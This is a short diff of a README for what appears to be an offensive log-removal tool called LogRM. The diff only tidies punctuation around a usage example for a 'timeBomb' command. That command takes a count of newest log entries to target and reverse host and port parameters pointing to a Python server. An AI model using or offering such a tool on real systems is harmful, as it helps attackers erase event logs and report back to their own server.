tasox/LogRM/README.md

 Tip: Give as much as possible amount of entries in -newest parameter.
 For example: 5000

-The task is going to run "now"
+The task is going to run now.
 ```
 timeBomb -task now -ip 127.0.0.1 -newest <give a big number> -reverseHost <Python server ip> -reversePort <Python server port>
 ```